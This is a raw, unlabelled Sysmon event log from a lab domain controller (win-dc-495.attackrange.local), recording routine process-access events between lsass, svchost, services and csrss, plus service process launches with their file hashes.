13:34:14.839{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft 
CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.848{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.845{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.845{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.842{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.841{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.841{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.839{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.839{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 